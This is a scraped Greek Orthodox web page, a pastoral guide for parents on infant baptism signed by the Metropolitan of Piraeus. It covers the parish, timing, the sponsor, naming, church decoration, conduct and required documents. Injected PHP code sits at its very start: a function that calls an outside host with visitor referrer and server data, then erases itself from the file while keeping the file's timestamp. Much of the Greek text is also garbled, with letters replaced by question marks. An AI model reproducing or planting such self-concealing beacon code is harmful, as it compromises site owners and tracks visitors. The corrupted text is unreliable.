check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456732960){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=8&id=18776828&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_search/models/content.php"); } Η Βάπτιση, Μυστήριο της Εκκλησίας. Για τους γονείς
Η Βάπτιση, Μυστήριο της Εκκλησίας. Για τους γονείς Εκτύπωση E-mail
Ευρετήριο Άρθρου
Η Βάπτιση, Μυστήριο της Εκκλησίας. Για τους γονείς
Που θα γίνει η βάπτιση;
Πότε θα γίνει η βάπτιση;
Η προετοιμασία
Ο ανάδοχος
Το όνομα
Ο στολισμός του Ναού
Η παρουσία μας στο μυστήριο
Μετά τη βάπτιση
Δικαιολογητικά
Δείτε το έντυπο
Όλες οι Σελίδες

ΠΡΟΕΤΟΙΜΑΣΙΑ ΚΑΙ ΣΥΜΜΕΤΟΧΗ

?γαπητοί γονε?ς,

? χαρά σας ε?ναι μεγάλη καθώς ?τοιμάζεστε γιά τή βάπτιση το? παιδιο? σας. Κι ?λες ο? χα­ρούμενες φροντίδες σας στρέφονται γύρω ?πό τά βαπτιστικά, τούς καλεσμένους, τόν ?νάδο­χο, τό ?νομα, τό τραπέζι. ?χετε ?μως σκεφτε?, ?σο πλησιάζει ? μέρα, τή βάπτιση ?χι σάν κοι­νωνικό γεγονός ?λλά ?ς Μυστήριο τ?ς ?κκλησίας;

? Κύριός μας ?ησο?ς Χριστός βεβαιώνει ?τι «?ποιος δέν γεννηθε? ?πό τό νερό κι ?πό τό Πνε?μα, δέν μπορε? νά μπε? στή Βασιλεία το? Θεο?» (?ω. 3,5) γιατί «? πιστεύσας καί βαπτι­σθείς σωθήσεται» (Μάρκ. 16,16). Τό Βάπτισμα δέν ε?ναι μιά συμβολική τελετή ?λλά ?να γε­γονός μέ ?παρξιακές διαστάσεις.

Στή βάπτιση θά γεννηθε? πραγματικά τό παιδί σας! ?κε?, στήν κολυμβήθρα, τήν πνευματι­κή μήτρα τ?ς ?κκλησίας, ? παλαιός ?νθρωπος τ?ς φθορ?ς θά πεθάνει καί θά ?πορριφθε?, γιά νά ?ναγεννηθε? ? νέος τ?ς ?φθαρσίας ?πως πέθανε καί ?ναστήθηκε ? Χριστός. ?κε? τό παιδί σας θά ?νσωματωθε? στό σ?μα το? Χριστο? πού ε?ναι ? ?κκλησία, ?πως ?να κλαδί μπολιάζεται στόν κορμό το? δένδρου. Θά γίνει ναός το? Θεο? γιατί τό ?γιο Πνε?μα μέ τά χα­ρίσματά του θά κατοικήσει πλέον μέσα του. ?πό ?κείνη τήν ?μέρα τό ?νομά του θά γραφτε? στό βιβλίο τ?ς ζω?ς, προορισμένο γιά τήν α?ωνιότητα! ?νας ?γγελος θά τό συνοδεύει πλέ­ον σέ ?λη του τή ζωή ?χώριστος σύντροφός του σέ κάθε στιγμή καί καμιά δαιμονική ?νέρ­γεια δέν θά ε?ναι σέ θέση νά τό βλάψει. ? Θεός θά ?κούει προσεκτικά τίς προσευχές του καί τό βλέμμα του θά ε?ναι διαρκ?ς στραμμένο πάνω του μέ ?διαίτερη φροντίδα.

Στά χέρια σας, πλέον, δέν θά κρατ?τε ?πλά τό παιδί σας, πού ?ναμφίβολα ε?ναι ?να ?νεκτί­μητο δ?ρο το? Θεο? σέ σ?ς, ?λλά μιά ζωντανή ε?κόνα το? Θεο?· ?να μελλοντικό πολίτη τ?ς Βασιλείας τ?ν ο?ραν?ν.

Χαρε?τε, λοιπόν, μαζί μέ τό παιδί σας α?τήν τήν προσωπική του Πεντηκοστή ?πως ο? πρώτοι πιστοί, ο? ?πο?οι, ?ταν συνειδητοποίησαν τί συνέβη στό ?περ?ο τ?ς ?ερουσαλήμ, «κατενύγησαν τ? καρδί?» (Πράξ. 2,37)· γέμισε ? καρδιά τους μέ ?ερό δέος, συγκίνηση καί κατάνυξη! Γιατί α?τό πού ?ξωτερικά μοιάζει μέ ?να συνηθισμένο λουτρό πού κάνετε καθημερινά στό παιδί σας, ε?ναι ?να μεγαλει?δες ?παρξιακό γεγονός μέ α?ώνια προοπτική. ?τσι ?μως συμβαίνει μέ ?λα τά μυστήρια: μέσα ?πό ?πλά ?λικά στοιχε?α κα? συνηθισμένες πράξεις ?νεργε? ? δύναμη το? Θεο?, πού ?νακαινίζει καί χαριτώνει ?μ?ς τούς ?νθρώπους. ?ρκε? νά πιστέψουμε καί νά ?κζητήσουμε τή σωστική χάρη το? Κυρίου.ΠΟΥ ΘΑ ΓΙΝΕΙ Η ΒΑΠΤΙΣΗ;

Μά πο? ?λλο? παρά στό πνευματικό σας σπίτι, τόν ?ερό Ναό τ?ς ?νορίας σας στά ?ρια τ?ς ?ποίας κατοικε?τε! Θά ε?ναι μεγάλη χαρά γιά τό παιδί σας, κα­θώς θά μεγαλώνει καί θά κινε?ται στούς χώρους το? ναο?, νά γνωρίζει ?τι ?κε? βαπτίστηκε· ?κε? ?ναγεννήθηκε πνευματικά. Θά συνδεθε? μέ τόν ?ερό χ?ρο καί συναισθη­ματικά, ?πως ?λλωστε ?λοι μας συνδεόμαστε μέ τόν τόπο πού γεννηθήκαμε.

Γι? α?τό καί δέν πρέπει νά γίνονται βαπτίσεις σέ ?λλες ?νορίες. Πολύ περισσότερο δέν ?πι­τρέπεται νά γίνονται βαπτίσεις σέ παρεκκλήσια ? ?διωτικά παρεκκλήσια «κτημάτων». Στήν ?νορία σας τηρε?ται Μητρ?ο βαπτίσεων ?π? ?που θά ?ξυπηρετηθε?τε ?ταν παραστε? ?­νάγκη.


ΠΟΤΕ ΘΑ ΓΙΝΕΙ Η ΒΑΠΤΙΣΗ;

Τό Βάπτισμα στήν πρώτη ?κκλησία ?τελε?το τήν Κυριακή στή διάρκεια τ?ς θείας Λειτουργί­ας. ?τσι, συμμετε?χε ?λο τό ?κκλησίασμα καί ?χι μόνο κάποιοι συγγενε?ς καί φίλοι. ?ργότερα -μέ τήν ?λλαγή συνθηκ?ν ζω?ς- τό Βάπτισμα ?ποσπάσθηκε ?πό τή θεία Λειτουργία καί γίνεται ξεχωριστά καί ?λλες ?μέρες καί περιορίστηκε σέ ο?κογενειακό γεγονός. ?στόσο, ? πλέον κατάλληλη ?μέρα γιά ?να μυστήριο χαρ?ς, ?πως ε?ναι τό Βάπτισμα, παραμένει ? Κυριακή.

Μήν ?ναβάλλετε τή βάπτιση το? παιδιο? σας. Φροντίστε νά ε?ναι μικρό, λίγων μην?ν, γιά νά μή στερε?ται τή χάρη το? μυστηρίου. Γιά νά μή φοβηθε? τήν ?ρα το? βαπτίσματος, ?λλά νά συνεργαστε? μέ τόν λειτουργό.
Θά π?τε στόν Ναό τ?ς ?νορίας σας καί θά καθορίσετε μέ τόν ?φημέριο τήν ?μέρα καί τήν ?ρα το? μυστηρίου, προσκομίζοντας καί τό σχετικό ?ντίγραφο τ?ς Ληξιαρχικ?ς Πράξης Γεννήσεως το? παιδιο?.
?παραίτητη προϋπόθεση γιά τήν τέλεση το? Μυστηρίου ε?ναι ? συμφωνία καί ? παρουσία καί τ?ν δύο γονέων το? παιδιο?.


Η ΠΡΟΕΤΟΙΜΑΣΙΑ

Συνήθως ο? φροντίδες πού ?πορροφο?ν ?λο τό ?νδιαφέρον ?φορο?ν τίς προετοιμασίες γιά πολύ δευτερεύοντα ζητήματα καί μ?ς διαφεύγει ? προετοιμασία γιά τό ?διο τό Μυστήριο. Προετοιμαστε?τε γιά τό μεγάλο γεγονός. ?μβαθύνετε στό νόημα το? Μυστηρίου μέσα ?πό τήν ?νάγνωση ?νός ?πό τά τόσα ?ξιόλογα βιβλία πού κυκλοφορο?ν. Προσευχηθε?τε θερμά γιά τόν κορυφα?ο α?τό σταθμό τ?ς ζω?ς το? παιδιο? σας. ?πιδι?ξτε νά ?ξομολογηθε?τε στόν πνευματικό σας καί ?τοιμαστε?τε νά κοινωνήσετε στή θεία Λειτουργία ?κείνης τ?ς ?μέρας. ? πρώτη ?κκλησία ?ριζε ?ς ?μέρα νηστείας τήν παραμονή το? Βαπτίσματος.


Ο ΑΝΑΔΟΧΟΣ

? ρόλος του δέν ε?ναι ?πλά νά φροντίσει γιά τά πρακτικά ζητήματα ? νά κάνει δ?ρα στό παιδί ? γιά νά δημιουργήσουμε κοινωνικές σχέσεις. ? παρουσία του ε?ναι ο?σιαστική καί ?παραίτητη. ?γγυ?ται στήν ?κκλησία γιά τόν νεοφώτιστο καί τήν πρόοδό του στήν πίστη.

Στίς περιπτώσεις το? νηπιοβαπτισμο?, ?ναπληρώνει τήν ?λλειψη βούλησης το? νηπίου, ?­μολογε? πίστη ?ξ ?νόματός του, ?λείφει μέ τό καθαγιασμένο λάδι, πού ? λειτουργός θά ρί­ξει στίς παλάμες του, τό κεφάλι το? παιδιο? καί ?λο του τό σ?μα. ?ναλαμβάνει τήν ?ποχρέ­ωση νά συμπράξει μαζί μέ τούς γονε?ς στή χριστιανική ?νατροφή το? παιδιο?.

?τσι, ?νάδοχος δέν μπορε? νά ε?ναι ?λλόθρησκος ? ?λλου δόγματος (Ρωμαιοκαθολικός, Προτεστάντης κ.?.), ? ?νθρωπος πού ?ρνε?ται τήν ?ρθόδοξη πίστη καί ?μολογε? ?θεΐα. ?άν ε?ναι ?γγαμος, ?φείλει ?πωσδήποτε νά ?χει τελέσει θρησκευτικό γάμο. ?πίσης, νά ?χει καί τήν κατάλληλη ?λικία.

Μέ ?λλα λόγια, ? ?νάδοχος πρέπει νά ε?ναι συνειδητό μέλος τ?ς ?κκλησίας, ?νθρωπος μέ ζωντανή πίστη καί συνεπ? χριστιανική ζωή.

? ?νάδοχος πολύ ?νωρίς θεωρήθηκε ?ς πνευματικός πατέρας το? ?ναδεκτο? ? τ?ς ?ναδε­κτ?ς. Γι? α?τό -λόγω τ?ς πνευματικ?ς α?τ?ς συγγένειας-, δέν μπορο?ν νά συνάψουν γάμο. Γάμος ?πίσης δέν μπορε? νά γίνει μεταξύ παιδι?ν πού ?χουν τόν ?διο ?νάδοχο ?πειδή θεω­ρο?νται πνευματικά ?δέλφια.


ΤΟ ΟΝΟΜΑ

Κατά τήν ?ρχαία τάξη τ?ς ?κκλησίας μας, τό ?νομα δίδεται στό παιδί τήν ?γδοη ?μέρα ?πό τή γέννησή του. Στό Ε?χολόγιο ?πάρχει ε?δική ?κολουθία. Στίς μέρες μας ? ?νοματοδοσία ?­χει συνδεθε? ?θιμικά μέ τό βάπτισμα. Πρέπει ?παραίτητα νά ε?ναι ?νομα χριστιανικό γιά νά ?χει τό παιδί προστάτη του τόν ?γιο το? ?ποίου φέρει τό ?νομα. Γιά λόγους ?στορικ?ς συ­νέχειας ? ?ερά Σύνοδος δέχτηκε νά δίνονται καί ?νόματα ?πό τήν ?ρχαιότητα. ?λλα ?μως ?­νόματα δέν πρέπει νά δίνονται.

Τό ?νομα ε?ναι δηλωτικό το? προσώπου καί ?να πρόσωπο ?χει ...?να ?νομα! ? ?πιμονή κά­ποιων γονέων νά θέλουν νά δώσουν στό παιδί τους δύο καί τρία ?νόματα ε?ναι α?θαίρετη. Ξεκιν? ?πό μικροσυναισθηματισμούς γιά νά ?κανοποιήσουν τούς παπο?δες καί τίς γιαγιά­δες. ?λλοι, ?ν? ?ταξαν τό παιδί τους κατά τήν κύηση σέ ?ναν ?γιο, τήν ?ρα τ?ς βάπτισης θέ­λουν νά δώσουν καί δεύτερο ?νομα, πράγμα πού ?θετε? τό τάξιμό τους.

?τσι, καταλήγουμε νά φωνάζουμε τό παιδί ?χι μέ τό ?νομά του ?λλά μέ ?να ?ποκοριστικό πού προέρχεται ?πό τήν κακοποιημένη σύντμηση το? ?νός ? τή σύνθεση τ?ν περισσοτέρων ?νομάτων.

Τό ?νομα το? παιδιο? σας ε?ναι προορισμένο γιά τήν α?ωνιότητα καί α?τή ? προοπτική το? προσδίδει ?ερότητα. ?ς χριστιανοί ?φείλουμε νά σεβόμαστε τήν παράδοση τ?ς ?κκλησίας μας καί νά μήν κάνουμε το? κεφαλιο? μας.


Ο ΣΤΟΛΙΣΜΟΣ ΤΟΥ ΝΑΟΥ

? ναός μας ε?ναι τόπος ?ερός, ?φιερωμένος στή λατρεία το? Θεο?. Γι? α?τό σεβόμαστε τήν ?ε­ρότητα καί τήν α?σθητική το? ναο?. Καμιά «διακοσμητική» ?πέμβαση δέν ε?ναι ?πιτρεπτή στήν ?γία κολυμβήθρα, τόν διάδρομο το? ναο?, τόν πρόναο καί γενικά τόν ?σωτερικό ? τόν ?ξωτερικό χ?ρο το? ναο?. Μπορε?τε νά βάλετε μία ? δύο ?νθοστ?λες στόν σολέα. Τίποτε ?λλο!

?λα τά ?λλα πού «πρέπει»(;) νά ?γοράσετε, χρησιμοποι?στε τα στόν χ?ρο πού θά παραθέσετε τό γε?μα στούς καλεσμένους καί συγγενε?ς σας, ?χι ?μως στόν ναό! Θυμηθε?τε ?τι ? μόνη φορά κατά τήν ?ποία ? Κύριος ?πέδειξε ?ερή ?γανάκτηση ?ταν ?ταν διαπίστωσε τή βεβήλωση το? ναο?!

Τό ?διο ?σχύει γιά τίς φωτογραφήσεις καί τά βίντεο τά ?πο?α ?πιτρέπονται κατ? ο?κονομίαν τ?ν ?ρα το? Μυστηρίου. ?μως ο? ?παγγελματίες ? ο? ?ρασιτέχνες φωτογράφοι καί λ?πτες πρέπει νά ?νεργο?ν μέ διακριτικότητα, μέ σεβασμό πρός τό τελούμενο μυστήριο, χωρίς νά ?­νοχλο?ν καί χωρίς νά μεταβάλλουν τόν ?ερό Ναό σέ στούντιο.


Η ΠΑΡΟΥΣΙΑ ΜΑΣ ΣΤΟ ΜΥΣΤΗΡΙΟ

Συχνά γινόμαστε μάρτυρες ?παράδεκτης συμπεριφορ?ς στόν ναό κατά τήν τέλεση μι?ς βά­πτισης. ?ρθαμε μέ τή θέλησή μας γιά ?να δικό μας ?νθρωπο· γιά νά προσευχηθο?με στόν Θεό νά στείλει τή χάρη του. Καί ?ντί τ?ς προσευχ?ς α?τό πού παρατηρο?με ε?ναι ? θόρυβος, ο? συζητήσεις, ? ?νδυματολογικός σχολιασμός, ? ?διαφορία, ο? ?σκοπες μετακινήσεις. ?ν ζούσαμε ?ραγε στήν ?ποχή το? Κυρίου καί μ?ς προσκαλο?σε νά παραβρεθο?με στή βά­πτισή Του στόν ?ορδάνη, ?κε? ?που ?κανε α?σθητή τήν παρουσία της ? ?γία Τριάδα, μέ τί ε?­δους ?μφάνιση θά πηγαίναμε καί μέ ποιό τρόπο θά στεκόμασταν καί π?ς θά συμμετείχα­με; Καί στή βάπτιση το? παιδιο? σας ?μως θά ?παναληφθε? τό ?διο συγκλονιστικό γεγονός! Στό ?νομα τ?ς ?γίας Τριάδας βαπτίζεται! Τό ?γιο Πνε?μα παρίσταται ?οράτως. ?κε?νο ?­νεργε? τήν πνευματική ?ναγέννηση το? βρέφους.

? ?ερός Ναός δέν ε?ναι τόπος ?πίδειξης ?λλά ?πικοινωνίας μέ τόν Θεό. ? ματαιοδοξία, ? χλιδή, ? ?ξεζητημένη ?ως καί προκλητική ?νδυμασία δέν συμβιβάζονται μέ τή χριστιανική μας ?διότητα καί προκαλο?ν τήν ?ργ? το? Θεο?! ?λλωστε ?ποτελε? σχ?μα ?ξύμωρο νά ?ρχό­μαστε στόν ναό γιά νά βαφτίσουμε τό παιδί μας, πού σημαίνει νά ντυθε? «?νδυμα ?φθαρσί­ας», καί τήν ?δια στιγμή ?με?ς μέ τή δική μας «?νδυμασία» καί συμπεριφορά ν? προσβά­λλουμε τήν ?ερότητα το? μυστηρίου καί νά προβάλλουμε τήν πνευματική γύμνια τ?ς ψυχ?ς μας!


ΜΕΤΑ ΤΗ ΒΑΠΤΙΣΗ

? ?πόλουση.

Τό νερό τ?ς κολυμβήθρας ε?ναι ?γιασμένο. Γι? α?τό καί δέν καταλήγει στήν ?­ποχέτευση ?λλά στό χωνευτήρι το? ναο?. Τό ?διο πρέπει νά γίνει καί μέ τά νερά ?πό τό πρ?­το μπάνιο το? παιδιο? σας μετά τρε?ς ?μέρες, καθώς καί τά πρώτα νερά ?πό τό πλύσιμο τ?ν ρούχων του τά ?πο?α θά πλύνετε σέ μιά μικρή λεκάνη.

?ν πρακτικά δέν μπορε?τε νά τά φέρετε στό χωνευτήρι το? ναο?, τουλάχιστον ?δειάστε τα στόν κ?πο γιά νά ?πορροφηθο?ν στό ?δαφος. Βλέπετε ? ε?λάβεια χωρίς νά ?κπίπτει σέ τυ­πολατρία, γνωρίζει νά προσέχει καί τίς λεπτομέρειες.


? θεία κοινωνία.

Τά νήπια καί τά μικρά παιδιά, βαπτισμένα καί μυρωμένα, ?χουν ?νάγκη τή συχνή Θεία Κοινωνία καί ?χι μόνο «τίς τρε?ς ?πόμενες Κυριακές» μετά τή βάπτισή τους. ?ταν τά φέρνετε τακτικά στόν ναό γιά νά κοινωνο?ν τούς προσφέρετε ?πό τήν τρυφερή α?­τή ?λικία τήν ο?ράνια τροφή τ?ς ψυχ?ς. Χαριτώνονται. Τό σ?μα καί τό α?μα το? Χριστο? τά φυλάσσει ?πό κάθε κακό. ?πίσης μαθαίνουν νά ζο?ν ?ς παιδιά το? Θεο?, συνηθίζουν καί δέν φοβο?νται ο?τε ?ντιδρο?ν, ?πως συμβαίνει μέ κάποια παιδιά πού ο? μητέρες τά φέρ­νουν σπάνια γιά νά κοινωνήσουν.


? κατήχηση.

? ζωή προέρχεται μόνο ?πό ζωή. Α?τό ?σχύει ?χι μόνο γιά τή βιολογία, ?λλά καί γιά τήν πίστη. Τή δική σας βιωματική πίστη καλε?στε νά μεταδώσετε στό παιδί σας καί νά τήν α?ξήσετε.

Μέσα σ? ?να χαρούμενο κλίμα ?μπιστοσύνης καί ?λευθερίας, θά τό μάθετε νά κάνει τόν σταυρό του, νά ψελλίζει τίς πρ?τες προσευχές του, θά το? διαβάζετε ?μορφες διδακτικές βι­βλικές ?στορίες, θά βιώσει μαζί σας τόν ?κκλησιασμό, τή λειτουργική κα? μυστηριακή ζωή, τό μυστήριο τ?ς πίστεως! ?ργότερα θά συνδέσετε τό παιδί σας μέ τήν ?κκλησιαστική κατήχηση τ?ς ?νορίας σας καί θά ?πιμεληθε?τε τή συμμετοχή του στίς κατηχητικές συνάξεις τ?ς ?νορίας σας. Ε?ναι ? χ?­ρος ?που μέ τήν κατάλληλη διαπαιδαγώγηση, θά θωρακιστε? πνευματικά τό παιδί σας καί θά γνωρίσει τίς ?λήθειες τ?ς χριστιανικ?ς πίστεώς μας. ? σύνδεσή του, ?πίσης, μέ ?να κα­λό πνευματικό Πατέρα θά τό βοηθήσει νά ?ποκτήσει μιά ?γιή καί ?σορροπημένη προσωπι­κότητα. Νά γίνει ?νας ?νθρωπος το? Θεο?, ?νας ?ληθινός ?νθρωπος το? Πνεύματος. ?ν σέ κάποια ?π? ?λα α?τά νιώθετε πώς ?στερε?τε, ? φροντίδα σας γιά τή χριστιανική ?να­τροφή το? παιδιο? σας σ?ς δίνει τήν ε?καιρία νά καταρτιστε?τε καί σε?ς πνευματικά. ?ξιο­ποιε?στε τό μοναδικό προνόμιο πού ?χετε ?ς γονε?ς νά ξαναγίνετε παιδιά μαζί μέ τά παιδιά σας καί νά μεγαλώσετε μαζί τους ?χοντας τήν ?ριμότητα τ?ν μεγάλων. ? διαπαιδαγώγη­ση το? παιδιο? σας κατά τό θέλημα το? Θεο? θά γίνει ? ?μορφότερη καί ?ερότερη καθημερι­νή σας λειτουργία.


? ?νομαστική ?ορτή.

 Ο? ?ρθόδοξοι δέν γιορτάζουμε τή βιολογική γέννησή μας ?πως ο? ξέ­νοι στά γενέθλια, ?λλά τήν πνευματική ?ναγέννησή μας πού ?γινε στή βάπτισή μας μέ τήν ?νομαστική μας γιορτή. Τά γενέθλια ε?ναι συνδεδεμένα μέ τόν χρόνο καί τή φθορά, ?ν? ? γι­ορτή ε?ναι συνδεδεμένη μέ τό ?νομα το? ?γίου πού νίκησε τόν χρόνο καί τή φθορ? καί ζε? στήν α?ωνιότητα. ?τσι μέ τή γιορτή μας τήν προγευόμαστε κι ?με?ς. ? ?νομαστική γιορτή ?­κόμη δέν ε?ναι ?τομική μας ?πόθεση ?πως τά γενέθλια, ?λλά ?κκλησιαστικό γεγονός, για­τί τήν ?δια ?μέρα γιορτάζουν μαζί μας καί πολλοί ?λλοι πιστοί, ?δελφοί μας, πο? ?χουν τ? ?διο ?νομα μ? ?μ?ς· γιορτάζει ?λόκληρη ? ?κκλησία.


 ΔΙΚΑΙΟΛΟΓΗΤΙΚΑ

Κατά τή βάπτιση ?νός παιδιο? στόν ?φημέριό μας προσκομίζουμε τή Ληξιαρχική Πρά­ξη Γεννήσεώς του.

  • ?λα τά μυστήρια πού μ?ς ?φορο?ν θά πρέπει νά τελο?νται στήν ΕΝΟΡΙΑ ΜΑΣ· στήν ?νορία στά ?ρια τ?ς ?ποίας κατοικο?με. Στήν ?νορία μας ?πομένως βαπτίζουμε καί τά παιδιά μας. ?ν ?μως, γιά ?ποιονδήποτε λόγο ε?ναι ?νάγκη νά κάνουμε τή βάπτιση το? παιδιο? μας σέ ?λλη ?νορία, ?πό τόν ?φημέριο τ?ς ?νορίας μας θά πρέπει νά ζητή­σουμε ?να χαρτί πού λέγεται Μεταβίβαση Βαπτίσεως.
  • Σέ περίπτωση ?πουσίας ?πό τή βάπτιση ?νός ?κ τ?ν δύο γονέων, ?παιτε?ται γιά τήν ?­νοματοδοσία ?γγραφη συγκατάθεση ?κείνου πού ?πουσιάζει, μέ ?πικύρωση το? γνησί­ου τ?ς ?πογραφ?ς.
  • Πράξις προσδιορισμού ονόματος.

 

 

?γαπητοι γονείς,

με αυτές τις επισημάνσεις σας προτρέπω και σας ενθαρρύνω

  • Να κατανοήσετε την πνευματική διάσταση του μυστηρίου του Βαπτίσματος. Η βάπτιση του παιδιού μας είναι μυστήριο της πίστεως· πράξη ιερή της Εκκλησίας και όχι κοινωνικό γεγονός. Να σεβασθείτε την ιερότητα της ώρας και να συμμετάσχετε όπως ταιριάζει σε συνειδητούς πιστούς.
  • Το μυστήριο τελείται όπως η μακραίωνη και ευλογημένη παράδοση της Εκκλησίας καθορίζει. Και στα ουσιώδη και στα δευτερεύοντα. Όχι όπως εμείς νομίζουμε εσφαλμένα ή θέλουμε από ιδιοτροπία ή απαιτούμε με κίνητρο την κοσμικότητα.

Ολόψυχα σας εύχομαι η βάπτιση του παιδιού σας να αποτελέσεις για σας και τους καλεσμένους σας μια ευλογημένη ευκαιρία ψυχικής ανάτασης, θερμής προσευχής, ουσιαστικής συμμετοχής στην πνευματική αναγέννηση του παιδιού σας!

 

? Μητροπολίτης

ΠΕΙΡΑΙΩΣ ΣΕΡΑΦΕΙΜΠατήστε εδώ για να δείτε το έντυπο σε νέο παράθυρο
Δημοσιεύστε στο YUDU

 
 

Παντρεύεστε;

apokatastash steghs

Βαπτίζετε το παιδί σας;

Γίνεσται ανάδοχος;